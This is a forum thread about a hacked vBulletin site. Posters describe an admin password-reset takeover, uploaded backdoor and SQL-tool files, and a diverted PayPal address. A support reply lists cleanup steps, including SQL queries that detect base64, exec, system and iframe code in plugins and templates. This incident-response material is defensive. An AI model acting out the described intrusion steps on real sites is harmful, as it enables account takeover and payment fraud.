Forum compromised

This sounds ike the server has been compromised in some way.

What version of vBulletin are you running?

That is what I thought.. looking at the logs 3 usernames were looked at all mine, 2 now removed and passwords changed... I have found upload logs for both files in CPanel.. so I think that is how they did it, not sure if banning the IP at server level and vBulletin level will help?

I am using 4.2.2 latest patch...

I have looked at all the files dated today and removed anything strange.. the two I found appear to be the only ones although I have asked the host's to check further...

Odd thing is someone also tried to log into my Gmail account using my password no idea how they got that... that was blocked by Google... again password changed twice by logging in without using the warning emails just in case


I think this email may have been related to one if my accounts

Worrying to say the least

I've had very similar yesterday with vB 3.8. The sequence of events was:

Password re-set requested for an administrator account.
Several attempts at sending reset token via HTTP get.
Looks like one of these was successful.
User logged in to vB Admin control panel.
Then from the vB Admin control panel they uploaded three "products" which were then subsequently "deleted"
A vBulletin "style" was also uploaded, accessed then deleted.
Options in the admincp were looked at and possibly changed (still investigating this).
In the payments API the destination e-mail address for PayPal payments was changed.
Uploaded files were usermain.php, xml.php (both in the forum folder) and phpinfo.php in the webroot and sqls.php in "client"

phpinfo.php - A file uploader
xml.php - A multi-use tool with various menu options.
usermain.php - A vBulletin "backdoor" that will log in any user by their userid
sqls.php - Single file SQL tool

Make sure that you are running the latest version of vB4 (4.2.3 at the moment).
Make sure php is at least 5.5.

Then go through the following:

1) Run Suspect File Diagnostics under Maintenance -> Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can't identify as belonging to your addons.

2) Search all templates for iframe tags. They should only appear in the following templates: bbcode_video, editor-ie.css, member.css, stylegenerator.css, vbcms.css, vbulletin.css, help_bbcodes, humanverify_recaptcha, search_common, and search_common_select_type

3) Check all your plugins for rogue include, require, include_once, or require_once code. All files should come from your server and be known to you.

4) Check your plugins for any base64 code. I recommend using against using any plugins or products that include base64 code in them. However some "lite" or branded addons will include this as a means to prevent you from cheating the author. You'll have to make a personal call on these if you use them. This is often a sign of a hacked site.

5) Make sure that your plugins do not include calls to exec(), system(), or pass_thru() or iframes. These are also often signs of a hacked site.

Query for step 4 and 5 -
SELECT title, phpcode, hookname, product FROM plugin WHERE phpcode LIKE '%base64%' OR phpcode LIKE '%exec%' OR phpcode LIKE '%system%' OR phpcode like '%pass_thru%' OR phpcode like '%iframe%';

6) Run this query:
SELECT styleid, title, template FROM template WHERE template LIKE '%base64%' OR template LIKE '%exec%' OR template LIKE '%system%' OR template like '%pass_thru%' OR template like '%iframe%';

7) Check your list of admins. If there are any you do not recognise, dete them (don't ban them, delete them).

If you're still unsure, and if you have support, please raise a support ticket and we'll take a look. We will need admincp access and ftp access.